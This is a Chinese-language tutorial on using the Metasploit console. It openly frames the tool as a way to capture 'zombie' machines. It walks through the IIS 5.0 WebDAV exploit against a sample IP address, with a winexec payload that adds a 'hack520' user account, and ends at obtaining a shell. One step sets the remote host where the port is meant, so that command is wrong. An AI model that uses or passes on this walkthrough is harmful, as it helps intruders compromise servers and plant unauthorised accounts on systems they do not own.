Metasploit 是個好東西，實在想不到別的辦法了，或許這東西能幫你一下，Metasploit包含了眾多exploit，說不準還能用上幾個，搞幾臺好肉雞.

下載Metasploit雙擊進行安裝，非常簡單，一路回車就行了。安裝完之後看下安裝目錄下的Msfconsole.bat和msfweb.bat,第一個是命令下的控制檯。第二個是圖形介面下的程式。現在我們先來看下命令列下的使用方法,執行後我們看到的是metasploit的歡迎介面，輸入“？”檢視幫助，如圖1

看到很多命令吧，我們來解釋一下

“？” 幫助“cd” :這個命令大家都熟悉，和WIN下面一樣，切換目錄“exit” 這個就是退出的意思“info”顯示當前程式資訊“quit”退出程式“reload”載入exploit和payloads“save”儲存設定“setg”設定一個環境變數“show”顯示當前可用的exploit“ use”選擇一個exp“version”顯示程式版本這麼多命令看起來肯定有些暈了吧其實用到的就"show" "info" "use"這3個，我們來看看是怎麼使用的

這個程式就是一個大的工具包，集成了N多EXPLOIT,我們可以用show exploits看看有哪些exploit程式,如圖2

看到了吧？這麼多溢位程式，想用哪個就用哪個，省得整天找。這麼多的東西該怎麼用呢？？比如我想用一個溢位程式，肯定得先看他的幫助瞭解使用方法。這就得用到info命令啦。這個命令就是顯示溢位程式的詳細資訊，比如我們想看下iis50_webdav_ntdll這個溢位程式的用法,就在命令列下輸入info exploit iis50_webdav_ntdll,就會看到圖3所示

這裡只是檢視Exploit的資訊，我們還可檢視shellcode的資訊。在這個工具包中，可以定義自己需要的shellcode.在命令列下輸入"show payloads"可以看到可用的shellcode列表，如圖4

左邊是名字，右邊是說明。我們可以用info命令檢視shellcode的具體資訊，輸入命令info payload  cmd_generic如圖5所示

這裡要注意的只是required和options,這裡required表示必選 options 表示可選可不選，以linux開頭的就是針對linux系統的shellcode，以CMD和WIN開頭的就是針對所有WIN系統。在溢位過程中一定要選對應的SHELLCODE才能成功。

好，現在我們來看實戰一下，我們拿webdav的溢位程式做例子,在命令中輸入use iis50_webdav_ntdll,然後再輸入show options 檢視要輸入的內容,如圖6所示

然後我們在命令列下輸入set rhost 192.168.1.223 set rhost 80 如圖7所示

到這裡了，得指定shellcode，輸入以下命令：set payload winexec輸完了按回車然後再輸入set cmd net user hack520 /add  如圖8所示

好了現在可以向192.168.1.223發起進攻了，輸入show targets 可以看到作業系統的代號，大家都知道webdav走針對2000系統，輸入 set targets 0 如圖9所示

沒有什麼問題了就輸入Exploit。如果對方伺服器存在這個漏洞話就會得到shell了